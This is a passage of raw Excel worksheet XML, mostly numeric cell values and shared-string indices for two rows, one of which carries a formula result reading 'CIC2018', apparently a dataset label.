      <c r="BS53" s="112">
        <v>2</v>
      </c>
      <c r="BT53" s="113">
        <v>10</v>
      </c>
      <c r="BU53" s="114" t="s">
        <v>3309</v>
      </c>
      <c r="BV53" s="503">
        <v>7</v>
      </c>
      <c r="BW53" s="115" t="s">
        <v>3310</v>
      </c>
      <c r="BX53" s="115">
        <v>7</v>
      </c>
      <c r="BY53" s="116">
        <v>3</v>
      </c>
      <c r="BZ53" s="250">
        <v>8</v>
      </c>
      <c r="CA53" s="251" t="s">
        <v>3311</v>
      </c>
      <c r="CB53" s="505">
        <v>3</v>
      </c>
      <c r="CC53" s="252" t="s">
        <v>3312</v>
      </c>
      <c r="CD53" s="252">
        <v>3</v>
      </c>
      <c r="CE53" s="253">
        <v>1</v>
      </c>
      <c r="CF53" s="101">
        <v>18</v>
      </c>
      <c r="CG53" s="102" t="s">
        <v>3313</v>
      </c>
      <c r="CH53" s="102">
        <v>10</v>
      </c>
      <c r="CI53" s="103" t="s">
        <v>3314</v>
      </c>
      <c r="CJ53" s="103">
        <v>10</v>
      </c>
      <c r="CK53" s="104">
        <v>3</v>
      </c>
      <c r="CL53" s="105">
        <v>0</v>
      </c>
      <c r="CM53" s="106">
        <v>0</v>
      </c>
      <c r="CN53" s="497">
        <v>0</v>
      </c>
      <c r="CO53" s="107">
        <v>0</v>
      </c>
      <c r="CP53" s="107">
        <v>0</v>
      </c>
      <c r="CQ53" s="108">
        <v>0</v>
      </c>
      <c r="CR53" s="109">
        <v>0</v>
      </c>
      <c r="CS53" s="110">
        <v>0</v>
      </c>
      <c r="CT53" s="501">
        <v>0</v>
      </c>
      <c r="CU53" s="111">
        <v>0</v>
      </c>
      <c r="CV53" s="111">
        <v>0</v>
      </c>
      <c r="CW53" s="112">
        <v>0</v>
      </c>
      <c r="CX53" s="113">
        <v>5</v>
      </c>
      <c r="CY53" s="114" t="s">
        <v>2022</v>
      </c>
      <c r="CZ53" s="503">
        <v>3</v>
      </c>
      <c r="DA53" s="115" t="s">
        <v>2023</v>
      </c>
      <c r="DB53" s="115">
        <v>3</v>
      </c>
      <c r="DC53" s="116">
        <v>2</v>
      </c>
      <c r="DD53" s="101">
        <v>0</v>
      </c>
      <c r="DE53" s="102">
        <v>0</v>
      </c>
      <c r="DF53" s="102">
        <v>0</v>
      </c>
      <c r="DG53" s="103">
        <v>0</v>
      </c>
      <c r="DH53" s="103">
        <v>0</v>
      </c>
      <c r="DI53" s="104">
        <v>0</v>
      </c>
      <c r="DJ53" s="105">
        <v>0</v>
      </c>
      <c r="DK53" s="106">
        <v>0</v>
      </c>
      <c r="DL53" s="497">
        <v>0</v>
      </c>
      <c r="DM53" s="107">
        <v>0</v>
      </c>
      <c r="DN53" s="107">
        <v>0</v>
      </c>
      <c r="DO53" s="108">
        <v>0</v>
      </c>
      <c r="DP53" s="109">
        <v>0</v>
      </c>
      <c r="DQ53" s="110">
        <v>0</v>
      </c>
      <c r="DR53" s="501">
        <v>0</v>
      </c>
      <c r="DS53" s="111">
        <v>0</v>
      </c>
      <c r="DT53" s="111">
        <v>0</v>
      </c>
      <c r="DU53" s="112">
        <v>0</v>
      </c>
      <c r="DV53" s="113">
        <v>5</v>
      </c>
      <c r="DW53" s="114" t="s">
        <v>3315</v>
      </c>
      <c r="DX53" s="503">
        <v>4</v>
      </c>
      <c r="DY53" s="115" t="s">
        <v>3316</v>
      </c>
      <c r="DZ53" s="115">
        <v>4</v>
      </c>
      <c r="EA53" s="116">
        <v>2</v>
      </c>
      <c r="EB53" s="250">
        <v>0</v>
      </c>
      <c r="EC53" s="251">
        <v>0</v>
      </c>
      <c r="ED53" s="505">
        <v>0</v>
      </c>
      <c r="EE53" s="252">
        <v>0</v>
      </c>
      <c r="EF53" s="252">
        <v>0</v>
      </c>
      <c r="EG53" s="253">
        <v>0</v>
      </c>
      <c r="EH53" s="101">
        <v>5</v>
      </c>
      <c r="EI53" s="102" t="s">
        <v>3315</v>
      </c>
      <c r="EJ53" s="102">
        <v>4</v>
      </c>
      <c r="EK53" s="103" t="s">
        <v>3316</v>
      </c>
      <c r="EL53" s="103">
        <v>4</v>
      </c>
      <c r="EM53" s="104">
        <v>2</v>
      </c>
      <c r="EN53" s="105">
        <v>0</v>
      </c>
      <c r="EO53" s="106">
        <v>0</v>
      </c>
      <c r="EP53" s="497">
        <v>0</v>
      </c>
      <c r="EQ53" s="107">
        <v>0</v>
      </c>
      <c r="ER53" s="107">
        <v>0</v>
      </c>
      <c r="ES53" s="108">
        <v>0</v>
      </c>
      <c r="ET53" s="109">
        <v>0</v>
      </c>
      <c r="EU53" s="110">
        <v>0</v>
      </c>
      <c r="EV53" s="501">
        <v>0</v>
      </c>
      <c r="EW53" s="111">
        <v>0</v>
      </c>
      <c r="EX53" s="111">
        <v>0</v>
      </c>
      <c r="EY53" s="112">
        <v>0</v>
      </c>
      <c r="EZ53" s="113">
        <v>0</v>
      </c>
      <c r="FA53" s="114">
        <v>0</v>
      </c>
      <c r="FB53" s="503">
        <v>0</v>
      </c>
      <c r="FC53" s="115">
        <v>0</v>
      </c>
      <c r="FD53" s="115">
        <v>0</v>
      </c>
      <c r="FE53" s="116">
        <v>0</v>
      </c>
      <c r="FF53" s="101">
        <v>2</v>
      </c>
      <c r="FG53" s="102" t="s">
        <v>1798</v>
      </c>
      <c r="FH53" s="102">
        <v>1</v>
      </c>
      <c r="FI53" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ53" s="103">
        <v>1</v>
      </c>
      <c r="FK53" s="104">
        <v>1</v>
      </c>
      <c r="FL53" s="105">
        <v>0</v>
      </c>
      <c r="FM53" s="106">
        <v>0</v>
      </c>
      <c r="FN53" s="497">
        <v>0</v>
      </c>
      <c r="FO53" s="107">
        <v>0</v>
      </c>
      <c r="FP53" s="107">
        <v>0</v>
      </c>
      <c r="FQ53" s="108">
        <v>0</v>
      </c>
      <c r="FR53" s="109">
        <v>2</v>
      </c>
      <c r="FS53" s="110" t="s">
        <v>1798</v>
      </c>
      <c r="FT53" s="501">
        <v>1</v>
      </c>
      <c r="FU53" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV53" s="111">
        <v>1</v>
      </c>
      <c r="FW53" s="112">
        <v>1</v>
      </c>
      <c r="FX53" s="113">
        <v>2</v>
      </c>
      <c r="FY53" s="114" t="s">
        <v>1798</v>
      </c>
      <c r="FZ53" s="503">
        <v>1</v>
      </c>
      <c r="GA53" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB53" s="115">
        <v>1</v>
      </c>
      <c r="GC53" s="116">
        <v>1</v>
      </c>
      <c r="GD53" s="250">
        <v>8</v>
      </c>
      <c r="GE53" s="251" t="s">
        <v>3311</v>
      </c>
      <c r="GF53" s="505">
        <v>3</v>
      </c>
      <c r="GG53" s="252" t="s">
        <v>3312</v>
      </c>
      <c r="GH53" s="252">
        <v>3</v>
      </c>
      <c r="GI53" s="253">
        <v>1</v>
      </c>
      <c r="GJ53" s="101">
        <v>10</v>
      </c>
      <c r="GK53" s="102" t="s">
        <v>3317</v>
      </c>
      <c r="GL53" s="102">
        <v>4</v>
      </c>
      <c r="GM53" s="103" t="s">
        <v>3318</v>
      </c>
      <c r="GN53" s="103">
        <v>4</v>
      </c>
      <c r="GO53" s="104">
        <v>1</v>
      </c>
      <c r="GP53" s="105">
        <v>0</v>
      </c>
      <c r="GQ53" s="106">
        <v>0</v>
      </c>
      <c r="GR53" s="497">
        <v>0</v>
      </c>
      <c r="GS53" s="107">
        <v>0</v>
      </c>
      <c r="GT53" s="107">
        <v>0</v>
      </c>
      <c r="GU53" s="108">
        <v>0</v>
      </c>
      <c r="GV53" s="109">
        <v>0</v>
      </c>
      <c r="GW53" s="110">
        <v>0</v>
      </c>
      <c r="GX53" s="501">
        <v>0</v>
      </c>
      <c r="GY53" s="111">
        <v>0</v>
      </c>
      <c r="GZ53" s="111">
        <v>0</v>
      </c>
      <c r="HA53" s="112">
        <v>0</v>
      </c>
      <c r="HB53" s="113">
        <v>2</v>
      </c>
      <c r="HC53" s="114" t="s">
        <v>1798</v>
      </c>
      <c r="HD53" s="503">
        <v>1</v>
      </c>
      <c r="HE53" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF53" s="115">
        <v>1</v>
      </c>
      <c r="HG53" s="116">
        <v>1</v>
      </c>
      <c r="HH53" s="101">
        <v>3</v>
      </c>
      <c r="HI53" s="102" t="s">
        <v>1975</v>
      </c>
      <c r="HJ53" s="102">
        <v>2</v>
      </c>
      <c r="HK53" s="103" t="s">
        <v>1814</v>
      </c>
      <c r="HL53" s="103">
        <v>2</v>
      </c>
      <c r="HM53" s="104">
        <v>1</v>
      </c>
      <c r="HN53" s="105">
        <v>0</v>
      </c>
      <c r="HO53" s="106">
        <v>0</v>
      </c>
      <c r="HP53" s="497">
        <v>0</v>
      </c>
      <c r="HQ53" s="107">
        <v>0</v>
      </c>
      <c r="HR53" s="107">
        <v>0</v>
      </c>
      <c r="HS53" s="108">
        <v>0</v>
      </c>
      <c r="HT53" s="109">
        <v>3</v>
      </c>
      <c r="HU53" s="110" t="s">
        <v>1975</v>
      </c>
      <c r="HV53" s="501">
        <v>2</v>
      </c>
      <c r="HW53" s="111" t="s">
        <v>1814</v>
      </c>
      <c r="HX53" s="111">
        <v>2</v>
      </c>
      <c r="HY53" s="112">
        <v>1</v>
      </c>
      <c r="HZ53" s="113">
        <v>3</v>
      </c>
      <c r="IA53" s="114" t="s">
        <v>1975</v>
      </c>
      <c r="IB53" s="503">
        <v>2</v>
      </c>
      <c r="IC53" s="115" t="s">
        <v>1814</v>
      </c>
      <c r="ID53" s="115">
        <v>2</v>
      </c>
      <c r="IE53" s="116">
        <v>1</v>
      </c>
      <c r="IF53" s="250">
        <v>0</v>
      </c>
      <c r="IG53" s="251">
        <v>0</v>
      </c>
      <c r="IH53" s="505">
        <v>0</v>
      </c>
      <c r="II53" s="252">
        <v>0</v>
      </c>
      <c r="IJ53" s="252">
        <v>0</v>
      </c>
      <c r="IK53" s="253">
        <v>0</v>
      </c>
      <c r="IL53" s="101">
        <v>3</v>
      </c>
      <c r="IM53" s="102" t="s">
        <v>1975</v>
      </c>
      <c r="IN53" s="102">
        <v>2</v>
      </c>
      <c r="IO53" s="103" t="s">
        <v>1814</v>
      </c>
      <c r="IP53" s="103">
        <v>2</v>
      </c>
      <c r="IQ53" s="104">
        <v>1</v>
      </c>
      <c r="IR53" s="105">
        <v>0</v>
      </c>
      <c r="IS53" s="106">
        <v>0</v>
      </c>
      <c r="IT53" s="497">
        <v>0</v>
      </c>
      <c r="IU53" s="107">
        <v>0</v>
      </c>
      <c r="IV53" s="107">
        <v>0</v>
      </c>
      <c r="IW53" s="108">
        <v>0</v>
      </c>
      <c r="IX53" s="109">
        <v>0</v>
      </c>
      <c r="IY53" s="110">
        <v>0</v>
      </c>
      <c r="IZ53" s="501">
        <v>0</v>
      </c>
      <c r="JA53" s="111">
        <v>0</v>
      </c>
      <c r="JB53" s="111">
        <v>0</v>
      </c>
      <c r="JC53" s="112">
        <v>0</v>
      </c>
      <c r="JD53" s="113">
        <v>3</v>
      </c>
      <c r="JE53" s="114" t="s">
        <v>1975</v>
      </c>
      <c r="JF53" s="503">
        <v>2</v>
      </c>
      <c r="JG53" s="115" t="s">
        <v>1814</v>
      </c>
      <c r="JH53" s="115">
        <v>2</v>
      </c>
      <c r="JI53" s="116">
        <v>1</v>
      </c>
      <c r="JJ53" s="101">
        <v>0</v>
      </c>
      <c r="JK53" s="102">
        <v>0</v>
      </c>
      <c r="JL53" s="102">
        <v>0</v>
      </c>
      <c r="JM53" s="103">
        <v>0</v>
      </c>
      <c r="JN53" s="103">
        <v>0</v>
      </c>
      <c r="JO53" s="104">
        <v>0</v>
      </c>
      <c r="JP53" s="105">
        <v>0</v>
      </c>
      <c r="JQ53" s="106">
        <v>0</v>
      </c>
      <c r="JR53" s="497">
        <v>0</v>
      </c>
      <c r="JS53" s="107">
        <v>0</v>
      </c>
      <c r="JT53" s="107">
        <v>0</v>
      </c>
      <c r="JU53" s="108">
        <v>0</v>
      </c>
      <c r="JV53" s="109">
        <v>0</v>
      </c>
      <c r="JW53" s="110">
        <v>0</v>
      </c>
      <c r="JX53" s="501">
        <v>0</v>
      </c>
      <c r="JY53" s="111">
        <v>0</v>
      </c>
      <c r="JZ53" s="111">
        <v>0</v>
      </c>
      <c r="KA53" s="112">
        <v>0</v>
      </c>
      <c r="KB53" s="113">
        <v>0</v>
      </c>
      <c r="KC53" s="114">
        <v>0</v>
      </c>
      <c r="KD53" s="503">
        <v>0</v>
      </c>
      <c r="KE53" s="115">
        <v>0</v>
      </c>
      <c r="KF53" s="115">
        <v>0</v>
      </c>
      <c r="KG53" s="116">
        <v>0</v>
      </c>
      <c r="KH53" s="250">
        <v>0</v>
      </c>
      <c r="KI53" s="251">
        <v>0</v>
      </c>
      <c r="KJ53" s="505">
        <v>0</v>
      </c>
      <c r="KK53" s="252">
        <v>0</v>
      </c>
      <c r="KL53" s="252">
        <v>0</v>
      </c>
      <c r="KM53" s="253">
        <v>0</v>
      </c>
      <c r="KN53" s="101">
        <v>0</v>
      </c>
      <c r="KO53" s="102">
        <v>0</v>
      </c>
      <c r="KP53" s="102">
        <v>0</v>
      </c>
      <c r="KQ53" s="103">
        <v>0</v>
      </c>
      <c r="KR53" s="103">
        <v>0</v>
      </c>
      <c r="KS53" s="104">
        <v>0</v>
      </c>
      <c r="KT53" s="105">
        <v>0</v>
      </c>
      <c r="KU53" s="106">
        <v>0</v>
      </c>
      <c r="KV53" s="497">
        <v>0</v>
      </c>
      <c r="KW53" s="107">
        <v>0</v>
      </c>
      <c r="KX53" s="107">
        <v>0</v>
      </c>
      <c r="KY53" s="108">
        <v>0</v>
      </c>
      <c r="KZ53" s="109">
        <v>0</v>
      </c>
      <c r="LA53" s="110">
        <v>0</v>
      </c>
      <c r="LB53" s="501">
        <v>0</v>
      </c>
      <c r="LC53" s="111">
        <v>0</v>
      </c>
      <c r="LD53" s="111">
        <v>0</v>
      </c>
      <c r="LE53" s="112">
        <v>0</v>
      </c>
      <c r="LF53" s="113">
        <v>0</v>
      </c>
      <c r="LG53" s="114">
        <v>0</v>
      </c>
      <c r="LH53" s="503">
        <v>0</v>
      </c>
      <c r="LI53" s="115">
        <v>0</v>
      </c>
      <c r="LJ53" s="115">
        <v>0</v>
      </c>
      <c r="LK53" s="116">
        <v>0</v>
      </c>
      <c r="LL53" s="117">
        <v>5</v>
      </c>
      <c r="LM53" s="507">
        <v>4</v>
      </c>
      <c r="LN53" s="119">
        <v>1</v>
      </c>
      <c r="LO53" s="119">
        <v>3</v>
      </c>
      <c r="LP53" s="119">
        <v>2</v>
      </c>
      <c r="LQ53" s="119">
        <v>1</v>
      </c>
      <c r="LR53" s="119">
        <v>2</v>
      </c>
      <c r="LS53" s="119">
        <v>2</v>
      </c>
      <c r="LT53" s="382"/>
      <c r="LU53" s="117">
        <v>0</v>
      </c>
      <c r="LV53" s="118">
        <v>0</v>
      </c>
      <c r="LW53" s="507">
        <v>0</v>
      </c>
      <c r="LX53" s="119">
        <v>0</v>
      </c>
      <c r="LY53" s="119">
        <v>0</v>
      </c>
      <c r="LZ53" s="119">
        <v>0</v>
      </c>
      <c r="MA53" s="117">
        <v>0</v>
      </c>
      <c r="MB53" s="118">
        <v>0</v>
      </c>
      <c r="MC53" s="507">
        <v>0</v>
      </c>
      <c r="MD53" s="119">
        <v>0</v>
      </c>
      <c r="ME53" s="119">
        <v>0</v>
      </c>
      <c r="MF53" s="119">
        <v>0</v>
      </c>
      <c r="MG53" s="117">
        <v>0</v>
      </c>
      <c r="MH53" s="118">
        <v>0</v>
      </c>
      <c r="MI53" s="507">
        <v>0</v>
      </c>
      <c r="MJ53" s="119">
        <v>0</v>
      </c>
      <c r="MK53" s="119">
        <v>0</v>
      </c>
      <c r="ML53" s="119">
        <v>0</v>
      </c>
      <c r="MM53" s="117">
        <v>0</v>
      </c>
      <c r="MN53" s="118">
        <v>0</v>
      </c>
      <c r="MO53" s="507">
        <v>0</v>
      </c>
      <c r="MP53" s="119">
        <v>0</v>
      </c>
      <c r="MQ53" s="119">
        <v>0</v>
      </c>
      <c r="MR53" s="119">
        <v>0</v>
      </c>
      <c r="MS53" s="117">
        <v>2</v>
      </c>
      <c r="MT53" s="118" t="s">
        <v>4227</v>
      </c>
      <c r="MU53" s="507">
        <v>1</v>
      </c>
      <c r="MV53" s="119" t="s">
        <v>3319</v>
      </c>
      <c r="MW53" s="119">
        <v>1</v>
      </c>
      <c r="MX53" s="119">
        <v>1</v>
      </c>
      <c r="MY53" s="117">
        <v>0</v>
      </c>
      <c r="MZ53" s="118">
        <v>0</v>
      </c>
      <c r="NA53" s="507">
        <v>0</v>
      </c>
      <c r="NB53" s="119">
        <v>0</v>
      </c>
      <c r="NC53" s="119">
        <v>0</v>
      </c>
      <c r="ND53" s="119">
        <v>0</v>
      </c>
      <c r="NE53" s="117">
        <v>0</v>
      </c>
      <c r="NF53" s="118">
        <v>0</v>
      </c>
      <c r="NG53" s="507">
        <v>0</v>
      </c>
      <c r="NH53" s="119">
        <v>0</v>
      </c>
      <c r="NI53" s="119">
        <v>0</v>
      </c>
      <c r="NJ53" s="119">
        <v>0</v>
      </c>
      <c r="NK53" s="117">
        <v>1</v>
      </c>
      <c r="NL53" s="118" t="s">
        <v>4167</v>
      </c>
      <c r="NM53" s="507">
        <v>1</v>
      </c>
      <c r="NN53" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO53" s="119">
        <v>1</v>
      </c>
      <c r="NP53" s="119">
        <v>1</v>
      </c>
      <c r="NQ53" s="117">
        <v>0</v>
      </c>
      <c r="NR53" s="118">
        <v>0</v>
      </c>
      <c r="NS53" s="507">
        <v>0</v>
      </c>
      <c r="NT53" s="119">
        <v>0</v>
      </c>
      <c r="NU53" s="119">
        <v>0</v>
      </c>
      <c r="NV53" s="119">
        <v>0</v>
      </c>
      <c r="NW53" s="117">
        <v>2</v>
      </c>
      <c r="NX53" s="118" t="s">
        <v>4371</v>
      </c>
      <c r="NY53" s="507">
        <v>2</v>
      </c>
      <c r="NZ53" s="119" t="s">
        <v>3320</v>
      </c>
      <c r="OA53" s="119">
        <v>2</v>
      </c>
      <c r="OB53" s="119">
        <v>2</v>
      </c>
      <c r="OC53" s="120">
        <v>4</v>
      </c>
      <c r="OD53" s="120">
        <v>4</v>
      </c>
      <c r="OE53" s="120">
        <v>4</v>
      </c>
      <c r="OF53" s="121">
        <v>3</v>
      </c>
      <c r="OG53" s="120">
        <v>3</v>
      </c>
      <c r="OH53" s="120">
        <v>3</v>
      </c>
      <c r="OI53" s="120">
        <v>3</v>
      </c>
      <c r="OJ53" s="120">
        <v>3</v>
      </c>
      <c r="OK53" s="383"/>
      <c r="OL53" s="120">
        <v>1</v>
      </c>
      <c r="OM53" s="120">
        <v>1</v>
      </c>
      <c r="ON53" s="120">
        <v>1</v>
      </c>
      <c r="OO53" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP53" s="120">
        <v>1</v>
      </c>
      <c r="OQ53" s="464">
        <v>1</v>
      </c>
      <c r="OR53" s="120">
        <v>0</v>
      </c>
      <c r="OS53" s="120">
        <v>0</v>
      </c>
      <c r="OT53" s="120">
        <v>0</v>
      </c>
      <c r="OU53" s="120"/>
      <c r="OV53" s="120">
        <v>0</v>
      </c>
      <c r="OW53" s="464">
        <v>0</v>
      </c>
      <c r="OX53" s="120">
        <v>1</v>
      </c>
      <c r="OY53" s="120">
        <v>1</v>
      </c>
      <c r="OZ53" s="120">
        <v>1</v>
      </c>
      <c r="PA53" s="120" t="s">
        <v>3321</v>
      </c>
      <c r="PB53" s="120">
        <v>1</v>
      </c>
      <c r="PC53" s="464">
        <v>1</v>
      </c>
      <c r="PD53" s="120">
        <v>0</v>
      </c>
      <c r="PE53" s="120">
        <v>0</v>
      </c>
      <c r="PF53" s="120">
        <v>0</v>
      </c>
      <c r="PG53" s="120"/>
      <c r="PH53" s="120">
        <v>0</v>
      </c>
      <c r="PI53" s="464">
        <v>0</v>
      </c>
      <c r="PJ53" s="120">
        <v>2</v>
      </c>
      <c r="PK53" s="120">
        <v>2</v>
      </c>
      <c r="PL53" s="120">
        <v>2</v>
      </c>
      <c r="PM53" s="120" t="s">
        <v>3322</v>
      </c>
      <c r="PN53" s="120">
        <v>2</v>
      </c>
      <c r="PO53" s="464">
        <v>2</v>
      </c>
      <c r="PP53" s="120">
        <v>1</v>
      </c>
      <c r="PQ53" s="120">
        <v>1</v>
      </c>
      <c r="PR53" s="120">
        <v>1</v>
      </c>
      <c r="PS53" s="120" t="s">
        <v>2517</v>
      </c>
      <c r="PT53" s="120">
        <v>1</v>
      </c>
      <c r="PU53" s="464">
        <v>1</v>
      </c>
      <c r="PV53" s="120">
        <v>0</v>
      </c>
      <c r="PW53" s="120">
        <v>0</v>
      </c>
      <c r="PX53" s="120">
        <v>0</v>
      </c>
      <c r="PY53" s="120"/>
      <c r="PZ53" s="120">
        <v>0</v>
      </c>
      <c r="QA53" s="464">
        <v>0</v>
      </c>
      <c r="QB53" s="120">
        <v>0</v>
      </c>
      <c r="QC53" s="120">
        <v>0</v>
      </c>
      <c r="QD53" s="120">
        <v>0</v>
      </c>
      <c r="QE53" s="120"/>
      <c r="QF53" s="120">
        <v>0</v>
      </c>
      <c r="QG53" s="464">
        <v>0</v>
      </c>
      <c r="QH53" s="120">
        <v>1</v>
      </c>
      <c r="QI53" s="120">
        <v>1</v>
      </c>
      <c r="QJ53" s="120">
        <v>1</v>
      </c>
      <c r="QK53" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL53" s="120">
        <v>1</v>
      </c>
      <c r="QM53" s="464">
        <v>1</v>
      </c>
      <c r="QN53" s="120">
        <v>2</v>
      </c>
      <c r="QO53" s="120">
        <v>2</v>
      </c>
      <c r="QP53" s="120">
        <v>1</v>
      </c>
      <c r="QQ53" s="120" t="s">
        <v>2587</v>
      </c>
      <c r="QR53" s="120">
        <v>1</v>
      </c>
      <c r="QS53" s="464">
        <v>1</v>
      </c>
      <c r="QT53" s="184"/>
      <c r="QU53" s="184"/>
      <c r="QV53" s="184"/>
      <c r="QW53" s="184"/>
      <c r="QX53" s="184"/>
      <c r="QY53" s="184"/>
      <c r="QZ53" s="184"/>
      <c r="RA53" s="184"/>
      <c r="RB53" s="184"/>
      <c r="RC53" s="184"/>
      <c r="RD53" s="184"/>
      <c r="RE53" s="184"/>
      <c r="RF53" s="184"/>
      <c r="RG53" s="184"/>
      <c r="RH53" s="184"/>
      <c r="RI53" s="184"/>
      <c r="RJ53" s="184"/>
      <c r="RK53" s="184"/>
      <c r="RL53" s="184"/>
      <c r="RM53" s="184"/>
      <c r="RN53" s="184"/>
      <c r="RO53" s="184"/>
      <c r="RP53" s="184"/>
      <c r="RQ53" s="184"/>
      <c r="RR53" s="184"/>
      <c r="RS53" s="184"/>
      <c r="RT53" s="184"/>
      <c r="RU53" s="184"/>
      <c r="RV53" s="184"/>
      <c r="RW53" s="184"/>
      <c r="RX53" s="184"/>
      <c r="RY53" s="184"/>
      <c r="RZ53" s="184"/>
      <c r="SA53" s="184"/>
      <c r="SB53" s="184"/>
      <c r="SC53" s="184"/>
      <c r="SD53" s="184"/>
      <c r="SE53" s="184"/>
      <c r="SF53" s="184"/>
      <c r="SG53" s="184"/>
      <c r="SH53" s="184"/>
      <c r="SI53" s="184"/>
      <c r="SJ53" s="184"/>
      <c r="SK53" s="184"/>
      <c r="SL53" s="184"/>
      <c r="SM53" s="184"/>
      <c r="SN53" s="184"/>
      <c r="SO53" s="184"/>
      <c r="SP53" s="184"/>
      <c r="SQ53" s="184"/>
      <c r="SR53" s="184"/>
      <c r="SS53" s="184"/>
      <c r="ST53" s="184"/>
      <c r="SU53" s="184"/>
      <c r="SV53" s="184"/>
      <c r="SW53" s="184"/>
      <c r="SX53" s="184"/>
      <c r="SY53" s="184"/>
      <c r="SZ53" s="184"/>
      <c r="TA53" s="184"/>
      <c r="TB53" s="184"/>
      <c r="TC53" s="184"/>
      <c r="TD53" s="184"/>
      <c r="TE53" s="184"/>
      <c r="TF53" s="184"/>
      <c r="TG53" s="184"/>
      <c r="TH53" s="184"/>
      <c r="TI53" s="184"/>
      <c r="TJ53" s="184"/>
      <c r="TK53" s="184"/>
      <c r="TL53" s="184"/>
      <c r="TM53" s="184"/>
      <c r="TN53" s="184"/>
      <c r="TO53" s="184"/>
      <c r="TP53" s="184"/>
      <c r="TQ53" s="184"/>
      <c r="TR53" s="184"/>
      <c r="TS53" s="184"/>
      <c r="TT53" s="184"/>
      <c r="TU53" s="184"/>
      <c r="TV53" s="184"/>
      <c r="TW53" s="184"/>
      <c r="TX53" s="184"/>
      <c r="TY53" s="184"/>
      <c r="TZ53" s="184"/>
      <c r="UA53" s="184"/>
      <c r="UB53" s="184"/>
      <c r="UC53" s="184"/>
      <c r="UD53" s="184"/>
      <c r="UE53" s="184"/>
      <c r="UF53" s="184"/>
      <c r="UG53" s="184"/>
      <c r="UH53" s="184"/>
      <c r="UI53" s="184"/>
      <c r="UJ53" s="184"/>
      <c r="UK53" s="184"/>
      <c r="UL53" s="184"/>
      <c r="UM53" s="184"/>
      <c r="UN53" s="184"/>
      <c r="UO53" s="184"/>
      <c r="UP53" s="184"/>
      <c r="UQ53" s="184"/>
      <c r="UR53" s="184"/>
      <c r="US53" s="184"/>
      <c r="UT53" s="184"/>
      <c r="UU53" s="184"/>
      <c r="UV53" s="184"/>
      <c r="UW53" s="184"/>
      <c r="UX53" s="184"/>
      <c r="UY53" s="184"/>
      <c r="UZ53" s="184"/>
      <c r="VA53" s="184"/>
      <c r="VB53" s="184"/>
      <c r="VC53" s="184"/>
      <c r="VD53" s="184"/>
      <c r="VE53" s="184"/>
      <c r="VF53" s="184"/>
      <c r="VG53" s="184"/>
      <c r="VH53" s="184"/>
      <c r="VI53" s="184"/>
      <c r="VJ53" s="184"/>
      <c r="VK53" s="184"/>
      <c r="VL53" s="184"/>
      <c r="VM53" s="184"/>
      <c r="VN53" s="184"/>
      <c r="VO53" s="184"/>
      <c r="VP53" s="184"/>
      <c r="VQ53" s="184"/>
      <c r="VR53" s="184"/>
      <c r="VS53" s="184"/>
      <c r="VT53" s="184"/>
      <c r="VU53" s="184"/>
      <c r="VV53" s="184"/>
      <c r="VW53" s="184"/>
      <c r="VX53" s="184"/>
      <c r="VY53" s="184"/>
    </row>
    <row r="54" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A54" s="82" t="s">
        <v>22</v>
      </c>
      <c r="B54" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C54" s="83" t="s">
        <v>327</v>
      </c>
      <c r="D54" s="83" t="s">
        <v>96</v>
      </c>
      <c r="E54" s="83">
        <f t="shared" si="2"/>
        <v>40</v>
      </c>
      <c r="F54" s="83" t="s">
        <v>97</v>
      </c>
      <c r="G54" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H54" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I54" s="81" t="s">
        <v>1233</v>
      </c>
      <c r="J54" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K54" s="81" t="s">
        <v>1234</v>
      </c>
      <c r="L54" s="81" t="s">
        <v>1235</v>
      </c>
      <c r="M54" s="378" t="s">
        <v>271</v>
      </c>
      <c r="N54" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O54" s="485" t="str">
        <f t="shared" si="1"/>
        <v>CIC2018</v>
      </c>
      <c r="P54" s="91"/>
      <c r="Q54" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R54" s="92" t="s">
        <v>1236</v>
      </c>
      <c r="S54" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T54" s="92" t="s">
        <v>1237</v>
      </c>
      <c r="U54" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V54" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W54" s="96" t="s">
        <v>1238</v>
      </c>
      <c r="X54" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y54" s="83" t="s">
        <v>1239</v>
      </c>
      <c r="Z54" s="98" t="s">
        <v>886</v>
      </c>
      <c r="AA54" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB54" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC54" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD54" s="83"/>
      <c r="AE54" s="83"/>
      <c r="AF54" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG54" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH54" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI54" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ54" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK54" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL54" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM54" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN54" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO54" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP54" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ54" s="358">
        <v>260</v>
      </c>
      <c r="AR54" s="100"/>
      <c r="AS54" s="100">
        <v>236</v>
      </c>
      <c r="AT54" s="100">
        <v>0</v>
      </c>
      <c r="AU54" s="100">
        <v>236</v>
      </c>
      <c r="AV54" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW54" s="100">
        <v>1</v>
      </c>
      <c r="AX54" s="100">
        <v>1</v>
      </c>
      <c r="AY54" s="100">
        <v>0</v>
      </c>
      <c r="AZ54" s="100">
        <v>1</v>
      </c>
      <c r="BA54" s="381"/>
